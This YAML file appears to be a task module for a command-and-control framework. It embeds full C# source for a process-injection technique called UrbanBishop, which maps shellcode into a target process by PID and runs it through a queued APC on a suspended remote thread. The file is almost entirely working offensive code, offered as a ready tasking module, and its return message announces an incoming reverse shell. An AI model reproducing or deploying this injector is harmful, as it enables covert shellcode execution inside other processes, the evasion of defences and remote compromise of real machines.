UrbanBishop.yaml
- Name: UrbanBishop
Aliases: []
Author:
Name: ''
Handle: ''
Link: ''
Description: A QueueAPC-based injection method {@FuzzySecurity} Main One
Help:
Language: CSharp
CompatibleDotNetVersions:
- Net35
- Net40
Code: "using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing System.Text.RegularExpressions;\nusing System.IO;\n\n\npublic static class Task\n{\n // Structs\n //-----------------------------------\n [StructLayout(LayoutKind.Sequential)]\n public struct PROC_VALIDATION\n {\n public Boolean isvalid;\n public String sName;\n public IntPtr hProc;\n public IntPtr pNtllBase;\n public Boolean isWow64;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct SC_DATA\n {\n public UInt32 iSize;\n public byte[] bScData;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct SECT_DATA\n {\n public Boolean isvalid;\n public IntPtr hSection;\n public IntPtr pBase;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct UNICODE_STRING\n {\n public UInt16 Length;\n public UInt16 MaximumLength;\n public IntPtr Buffer;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct ANSI_STRING\n {\n public UInt16 Length;\n public UInt16 MaximumLength;\n public IntPtr Buffer;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct CLIENT_ID\n {\n public IntPtr UniqueProcess;\n public IntPtr UniqueThread;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public class THREAD_BASIC_INFORMATION\n {\n public UInt32 ExitStatus;\n public IntPtr TebBaseAddress;\n public CLIENT_ID ClientId;\n public UIntPtr AffinityMask;\n public int Priority;\n public int BasePriority;\n }\n\n [StructLayout(LayoutKind.Sequential, Pack = 0)]\n public struct OBJECT_ATTRIBUTES\n {\n public Int32 Length;\n public IntPtr RootDirectory;\n public IntPtr ObjectName;\n public uint Attributes;\n public IntPtr SecurityDescriptor;\n public IntPtr SecurityQualityOfService;\n }\n\n // APIs\n //-----------------------------------\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtOpenProcess(\n ref IntPtr ProcessHandle,\n UInt32 DesiredAccess,\n ref OBJECT_ATTRIBUTES ObjectAttributes,\n ref CLIENT_ID ClientId);\n\n [DllImport(\"ntdll.dll\")]\n public static 
extern UInt32 NtQueryInformationProcess(\n IntPtr processHandle,\n UInt32 processInformationClass,\n ref ulong processInformation,\n int processInformationLength,\n ref UInt32 returnLength);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtCreateSection(\n ref IntPtr section,\n UInt32 desiredAccess,\n IntPtr pAttrs,\n ref long MaxSize,\n uint pageProt,\n uint allocationAttribs,\n IntPtr hFile);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtMapViewOfSection(\n IntPtr SectionHandle,\n IntPtr ProcessHandle,\n ref IntPtr BaseAddress,\n IntPtr ZeroBits,\n IntPtr CommitSize,\n ref long SectionOffset,\n ref long ViewSize,\n uint InheritDisposition,\n uint AllocationType,\n uint Win32Protect);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtUnmapViewOfSection(\n IntPtr ProcessHandle,\n IntPtr BaseAddress);\n\n // Not used but for ref in case of\n // NtOpenThread -> NtQueueApcThread\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtOpenThread(\n IntPtr ThreadHandle,\n UInt32 DesiredAccess,\n ref OBJECT_ATTRIBUTES ObjectAttributes,\n IntPtr ClientId);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtQueueApcThread(\n IntPtr ThreadHandle,\n IntPtr ApcRoutine,\n IntPtr ApcArgument1,\n IntPtr ApcArgument2,\n IntPtr ApcArgument3);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtCreateThreadEx(\n ref IntPtr hThread,\n UInt32 DesiredAccess,\n IntPtr ObjectAttributes,\n IntPtr ProcessHandle,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n bool CreateSuspended,\n UInt32 StackZeroBits,\n UInt32 SizeOfStackCommit,\n UInt32 SizeOfStackReserve,\n IntPtr lpBytesBuffer);\n\n [DllImport(\"ntdll.dll\")]\n public static extern void RtlInitUnicodeString(\n ref UNICODE_STRING DestinationString,\n [MarshalAs(UnmanagedType.LPWStr)]\n string SourceString);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 RtlUnicodeStringToAnsiString(\n ref ANSI_STRING DestinationString,\n ref UNICODE_STRING 
SourceString,\n bool AllocateDestinationString);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 LdrGetDllHandle(\n IntPtr DllPath,\n IntPtr DllCharacteristics,\n ref UNICODE_STRING DllName,\n ref IntPtr DllHandle);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 LdrGetProcedureAddress(\n IntPtr hModule,\n ref ANSI_STRING ModName,\n UInt32 Ordinal,\n ref IntPtr FunctionAddress);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtAlertResumeThread(\n IntPtr ThreadHandle,\n ref UInt32 PreviousSuspendCount);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtQueryInformationThread(\n IntPtr ThreadHandle,\n int ThreadInformationClass,\n IntPtr ThreadInformation,\n int ThreadInformationLength,\n ref int ReturnLength);\n\n\n\n public static void CastleKingside(String Path, PROC_VALIDATION Pv, Int32 ProcId, Boolean Clean)\n {\n // Read in sc bytes\n SC_DATA scd = ReadShellcode(Path);\n if (scd.iSize == 0)\n {\n ////Console.WriteLine(\"[!] Unable to read shellcode bytes..\");\n return;\n }\n\n // Create local section & map view of that section as RW in our process\n ////Console.WriteLine(\"\\n[>] Creating local section..\");\n SECT_DATA LocalSect = MapLocalSection(scd.iSize);\n if (!LocalSect.isvalid)\n {\n return;\n }\n\n // Map section into remote process\n ////Console.WriteLine(\"[>] Map RX section to remote proc..\");\n SECT_DATA RemoteSect = MapRemoteSection(Pv.hProc, LocalSect.hSection, scd.iSize);\n if (!RemoteSect.isvalid)\n {\n return;\n }\n\n // Write sc to local section\n ////Console.WriteLine(\"[>] Write shellcode to local section..\");\n ////Console.WriteLine(\" |-> Size: \" + scd.iSize);\n Marshal.Copy(scd.bScData, 0, LocalSect.pBase, (int)scd.iSize);\n\n\n // Find remote thread start address offset from base -> RtlExitUserThread\n ////Console.WriteLine(\"[>] Seek export offset..\");\n ////Console.WriteLine(\" |-> pRemoteNtDllBase: 0x\" + String.Format(\"{0:X}\", (Pv.pNtllBase).ToInt64()));\n IntPtr pFucOffset 
= GetLocalExportOffset(\"ntdll.dll\", \"RtlExitUserThread\");\n if (pFucOffset == IntPtr.Zero)\n {\n return;\n }\n\n // Create suspended thread at RtlExitUserThread in remote proc\n ////Console.WriteLine(\"[>] NtCreateThreadEx -> RtlExitUserThread <- Suspended..\");\n IntPtr hRemoteThread = IntPtr.Zero;\n IntPtr pRemoteStartAddress = (IntPtr)((Int64)Pv.pNtllBase + (Int64)pFucOffset);\n UInt32 CallResult = NtCreateThreadEx(ref hRemoteThread, 0x1FFFFF, IntPtr.Zero, Pv.hProc, pRemoteStartAddress, IntPtr.Zero, true, 0, 0xffff, 0xffff, IntPtr.Zero);\n if (hRemoteThread == IntPtr.Zero)\n {\n //Console.WriteLine(\"[!] Failed to create remote thread..\");\n return;\n } else\n {\n //Console.WriteLine(\" |-> Success\");\n }\n\n // Queue APC\n //Console.WriteLine(\"[>] Set APC trigger & resume thread..\");\n CallResult = NtQueueApcThread(hRemoteThread, RemoteSect.pBase, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);\n if (CallResult == 0)\n {\n //Console.WriteLine(\" |-> NtQueueApcThread\");\n } else\n {\n //Console.WriteLine(\"[!] Unable register APC..\");\n return;\n }\n\n // Resume thread\n UInt32 SuspendCount = 0;\n CallResult = NtAlertResumeThread(hRemoteThread, ref SuspendCount);\n if (CallResult == 0)\n {\n //Console.WriteLine(\" |-> NtAlertResumeThread\");\n } else\n {\n //Console.WriteLine(\"[!] Failed to resume thread..\");\n }\n\n // Wait & clean up?\n if (Clean)\n {\n //Console.WriteLine(\"[>] Waiting for payload to finish..\");\n while (true)\n {\n THREAD_BASIC_INFORMATION ts = GetThreadState(hRemoteThread);\n if (ts.ExitStatus != 259) // STILL_ACTIVE\n {\n //Console.WriteLine(\" |-> Thread exit status -> \" + ts.ExitStatus);\n UInt32 Unmap = NtUnmapViewOfSection(Pv.hProc, RemoteSect.pBase);\n if (Unmap == 0)\n {\n //Console.WriteLine(\" |-> NtUnmapViewOfSection\");\n } else\n {\n //Console.WriteLine(\"[!] 
Failed to unmap remote section..\");\n }\n break;\n }\n System.Threading.Thread.Sleep(400); // Sleep precious, sleep\n }\n }\n }\n\n private static int FindProcessPid(string process)\n {\n int pid = 0;\n int session = Process.GetCurrentProcess().SessionId;\n Process[] processes = Process.GetProcessesByName(process);\n\n foreach (Process proc in processes)\n {\n if (proc.SessionId == session)\n {\n pid = proc.Id;\n }\n }\n\n return pid;\n }\n\n public static string Execute(String Path, String ProcID)\n {\n //Process p = new Process();\n //p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;\n // p.StartInfo.FileName = @\"C:\\Windows\\System32\\notepad.exe\";\n //p.StartInfo.FileName = @\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\";\n //p.Start();\n //int pid = FindProcessPid(\"explorer\");\n //int pid = Int32.parse(ProcID);\n //int pid = p.Id;\n int pid = Convert.ToInt32(ProcID);\n \n //int iPathScBin = Array.FindIndex(args, s => new Regex(@\"(?i)(-|--|/)(p|Path)$\").Match(s).Success);\n int iPID = pid;\n //int bClean = Array.FindIndex(args, s => new Regex(@\"(?i)(-|--|/)(c|Clean)$\").Match(s).Success);\n //int bClean = 0;\n Boolean Clean = true;\n String sPathScBin = Path;\n Int32 Proc = iPID;\n PROC_VALIDATION pv = ValidateProc(Proc);\n \n CastleKingside(sPathScBin, pv, Proc, Clean);\n \n return \"Injection is Done...Reverse shell coming\";\n \n }\n\n // Helpers\n //-----------------------------------\n public static void GetHelp()\n {\n //Console.WriteLine(\"[!] 
Missing arguments..\\n\");\n //Console.WriteLine(\" -p (--Path) Full path to the shellcode binary file\");\n //Console.WriteLine(\" -i (--Inject) PID to inject\");\n //Console.WriteLine(\" -c (--Clean) Optional, wait for payload to exit and clean up\");\n }\n\n // Banner\n //-----------------------------------\n public static void PrintBanner()\n {\n //Console.WriteLine(\" _O _____ _ \");\n //Console.WriteLine(\" / //\\\\ | | |___| |_ ___ ___ \");\n //Console.WriteLine(\" { } | | | _| . | .'| | \");\n //Console.WriteLine(\" \\\\___/ |_____|_| |___|__,|_|_| \");\n //Console.WriteLine(\" (___) \");\n //Console.WriteLine(\" |_| _____ _ _ \");\n //Console.WriteLine(\" / \\\\ | __ |_|___| |_ ___ ___ \");\n //Console.WriteLine(\" (_____) | __ -| |_ -| | . | . | \");\n //Console.WriteLine(\"(_______) |_____|_|___|_|_|___| _| \");\n //Console.WriteLine(\"/_______\\\\ |_| \");\n //Console.WriteLine(\" ~b33f~ \\n\");\n }\n\n public static Boolean PathIsFile(String Path)\n {\n try\n {\n FileAttributes CheckAttrib = File.GetAttributes(Path);\n if ((CheckAttrib & FileAttributes.Directory) == FileAttributes.Directory)\n {\n //Console.WriteLine(\"[!] Please specify a file path not a folder path (-p|--Path)\");\n return false;\n }\n } catch\n {\n //Console.WriteLine(\"[!] 
Invalid shellcode bin file path specified (-p|--Path)\");\n return false;\n }\n return true;\n }\n\n public static IntPtr GetProcessHandle(Int32 ProcId)\n {\n IntPtr hProc = IntPtr.Zero;\n OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES();\n CLIENT_ID ci = new CLIENT_ID();\n ci.UniqueProcess = (IntPtr)ProcId;\n UInt32 CallResult = NtOpenProcess(ref hProc, 0x1F0FFF, ref oa, ref ci);\n return hProc;\n }\n\n public static PROC_VALIDATION ValidateProc(Int32 ProcId)\n {\n PROC_VALIDATION Pv = new PROC_VALIDATION();\n\n try\n {\n Process Proc = Process.GetProcessById(ProcId);\n ProcessModuleCollection ProcModColl = Proc.Modules;\n foreach (ProcessModule Module in ProcModColl)\n {\n if (Module.FileName.EndsWith(\"ntdll.dll\"))\n {\n Pv.pNtllBase = Module.BaseAddress;\n }\n }\n Pv.isvalid = true;\n Pv.sName = Proc.ProcessName;\n Pv.hProc = GetProcessHandle(ProcId);\n ulong isWow64 = 0;\n uint RetLen = 0;\n NtQueryInformationProcess(Pv.hProc, 26, ref isWow64, Marshal.SizeOf(isWow64), ref RetLen);\n if (isWow64 == 0)\n {\n Pv.isWow64 = false;\n } else\n {\n Pv.isWow64 = true;\n }\n }\n catch\n {\n Pv.isvalid = false;\n }\n\n return Pv;\n }\n\n public static SC_DATA ReadShellcode(String Path)\n {\n \n //Path = @\"\";\n \n SC_DATA scd = new SC_DATA();\n try\n {\n scd.bScData = Convert.FromBase64String(Path);\n scd.iSize = (uint)scd.bScData.Length;\n } catch { }\n\n return scd;\n }\n\n public static SECT_DATA MapLocalSection(long ScSize)\n {\n SECT_DATA SectData = new SECT_DATA();\n\n long MaxSize = ScSize;\n IntPtr hSection = IntPtr.Zero;\n UInt32 CallResult = NtCreateSection(ref hSection, 0xe, IntPtr.Zero, ref MaxSize, 0x40, 0x8000000, IntPtr.Zero);\n if (CallResult == 0 && hSection != IntPtr.Zero)\n {\n //Console.WriteLine(\" |-> hSection: 0x\" + String.Format(\"{0:X}\", (hSection).ToInt64()));\n //Console.WriteLine(\" |-> Size: \" + ScSize);\n SectData.hSection = hSection;\n } else\n {\n //Console.WriteLine(\"[!] 
Failed to create section..\");\n SectData.isvalid = false;\n return SectData;\n }\n\n IntPtr pScBase = IntPtr.Zero;\n long lSecOffset = 0;\n CallResult = NtMapViewOfSection(hSection, (IntPtr)(-1), ref pScBase, IntPtr.Zero, IntPtr.Zero, ref lSecOffset, ref MaxSize, 0x2, 0, 0x4);\n if (CallResult == 0 && pScBase != IntPtr.Zero)\n {\n //Console.WriteLine(\" |-> pBase: 0x\" + String.Format(\"{0:X}\", (pScBase).ToInt64()));\n SectData.pBase = pScBase;\n } else\n {\n //Console.WriteLine(\"[!] Failed to map section locally..\");\n SectData.isvalid = false;\n return SectData;\n }\n\n SectData.isvalid = true;\n return SectData;\n }\n\n public static SECT_DATA MapRemoteSection(IntPtr hProc, IntPtr hSection, long ScSize)\n {\n SECT_DATA SectData = new SECT_DATA();\n\n IntPtr pScBase = IntPtr.Zero;\n long lSecOffset = 0;\n long MaxSize = ScSize;\n UInt32 CallResult = NtMapViewOfSection(hSection, hProc, ref pScBase, IntPtr.Zero, IntPtr.Zero, ref lSecOffset, ref MaxSize, 0x2, 0, 0x20);\n if (CallResult == 0 && pScBase != IntPtr.Zero)\n {\n //Console.WriteLine(\" |-> pRemoteBase: 0x\" + String.Format(\"{0:X}\", (pScBase).ToInt64()));\n SectData.pBase = pScBase;\n }\n else\n {\n //Console.WriteLine(\"[!] Failed to map section in remote process..\");\n SectData.isvalid = false;\n return SectData;\n }\n\n SectData.isvalid = true;\n return SectData;\n }\n\n public static IntPtr GetLocalExportOffset(String Module, String Export)\n {\n UNICODE_STRING uModuleName = new UNICODE_STRING();\n RtlInitUnicodeString(ref uModuleName, Module);\n IntPtr hModule = IntPtr.Zero;\n UInt32 CallResult = LdrGetDllHandle(IntPtr.Zero, IntPtr.Zero, ref uModuleName, ref hModule);\n if (CallResult != 0 || hModule == IntPtr.Zero)\n {\n //Console.WriteLine(\"[!] 
Failed to get \" + Module + \" handle..\");\n return IntPtr.Zero;\n } else\n {\n //Console.WriteLine(\" |-> LdrGetDllHandle OK\");\n }\n\n // Hey MSFT, why is RtlInitAnsiString not working on Win7..?\n UNICODE_STRING uFuncName = new UNICODE_STRING();\n RtlInitUnicodeString(ref uFuncName, Export);\n ANSI_STRING aFuncName = new ANSI_STRING();\n RtlUnicodeStringToAnsiString(ref aFuncName, ref uFuncName, true);\n IntPtr pExport = IntPtr.Zero;\n CallResult = LdrGetProcedureAddress(hModule, ref aFuncName, 0, ref pExport);\n \n if (CallResult != 0 || pExport == IntPtr.Zero)\n {\n //Console.WriteLine(\"[!] Failed to get \" + Export + \" address..\");\n return IntPtr.Zero;\n }\n else\n {\n //Console.WriteLine(\" |-> \" + Export + \": 0x\" + String.Format(\"{0:X}\", (pExport).ToInt64()));\n }\n\n IntPtr FuncOffset = (IntPtr)((Int64)(pExport) - (Int64)(hModule));\n //Console.WriteLine(\" |-> Offset: 0x\" + String.Format(\"{0:X}\", (FuncOffset).ToInt64()));\n\n return FuncOffset;\n }\n\n public static THREAD_BASIC_INFORMATION GetThreadState(IntPtr hThread)\n {\n THREAD_BASIC_INFORMATION ts = new THREAD_BASIC_INFORMATION();\n IntPtr BuffPtr = Marshal.AllocHGlobal(Marshal.SizeOf(ts));\n int RetLen = 0;\n UInt32 CallResult = NtQueryInformationThread(hThread, 0, BuffPtr, Marshal.SizeOf(ts), ref RetLen);\n if (CallResult != 0)\n {\n //Console.WriteLine(\"[!] Failed to query thread information..\");\n return ts;\n }\n\n // Ptr to struct\n ts = (THREAD_BASIC_INFORMATION)Marshal.PtrToStructure(BuffPtr, typeof(THREAD_BASIC_INFORMATION));\n\n return ts;\n }\n}\n\n"
TaskingType: Assembly
UnsafeCompile: false
TokenTask: false
Options:
- Name: Path
DefaultValue: ''
Description: Path to payload .bin file
SuggestedValues: []
Optional: false
DisplayInCommand: false
FileOption: true
- Name: ProcID
DefaultValue: ''
Description: Process ID of target process
SuggestedValues: []
Optional: false
DisplayInCommand: true
FileOption: false
ReferenceSourceLibraries: []
ReferenceAssemblies:
- Name: System.Configuration.Install.dll
Location: net35/System.Configuration.Install.dll
DotNetVersion: Net35
- Name: System.Drawing.dll
Location: net40/System.Drawing.dll
DotNetVersion: Net40
- Name: System.Data.DataSetExtensions.dll
Location: net40/System.Data.DataSetExtensions.dll
DotNetVersion: Net40
- Name: System.ServiceProcess.dll
Location: net40/System.ServiceProcess.dll
DotNetVersion: Net40
- Name: System.Core.dll
Location: net40/System.Core.dll
DotNetVersion: Net40
- Name: System.dll
Location: net40/System.dll
DotNetVersion: Net40
- Name: System.XML.dll
Location: net40/System.XML.dll
DotNetVersion: Net40
- Name: System.Configuration.Install.dll
Location: net40/System.Configuration.Install.dll
DotNetVersion: Net40
- Name: mscorlib.dll
Location: net40/mscorlib.dll
DotNetVersion: Net40
- Name: System.Data.dll
Location: net35/System.Data.dll
DotNetVersion: Net35
- Name: System.ServiceProcess.dll
Location: net35/System.ServiceProcess.dll
DotNetVersion: Net35
- Name: System.DirectoryServices.Protocols.dll
Location: net35/System.DirectoryServices.Protocols.dll
DotNetVersion: Net35
- Name: System.Data.DataSetExtensions.dll
Location: net35/System.Data.DataSetExtensions.dll
DotNetVersion: Net35
- Name: System.Drawing.dll
Location: net35/System.Drawing.dll
DotNetVersion: Net35
- Name: System.Web.Extensions.dll
Location: net35/System.Web.Extensions.dll
DotNetVersion: Net35
- Name: mscorlib.dll
Location: net35/mscorlib.dll
DotNetVersion: Net35
- Name: System.Core.dll
Location: net35/System.Core.dll
DotNetVersion: Net35
- Name: System.Security.dll
Location: net35/System.Security.dll
DotNetVersion: Net35
- Name: System.dll
Location: net35/System.dll
DotNetVersion: Net35
- Name: System.IdentityModel.dll
Location: net35/System.IdentityModel.dll
DotNetVersion: Net35
- Name: System.XML.dll
Location: net35/System.XML.dll
DotNetVersion: Net35
- Name: System.DirectoryServices.AccountManagement.dll
Location: net35/System.DirectoryServices.AccountManagement.dll
DotNetVersion: Net35
- Name: System.Data.dll
Location: net40/System.Data.dll
DotNetVersion: Net40
- Name: System.Management.dll
Location: net40/System.Management.dll
DotNetVersion: Net40
EmbeddedResources: []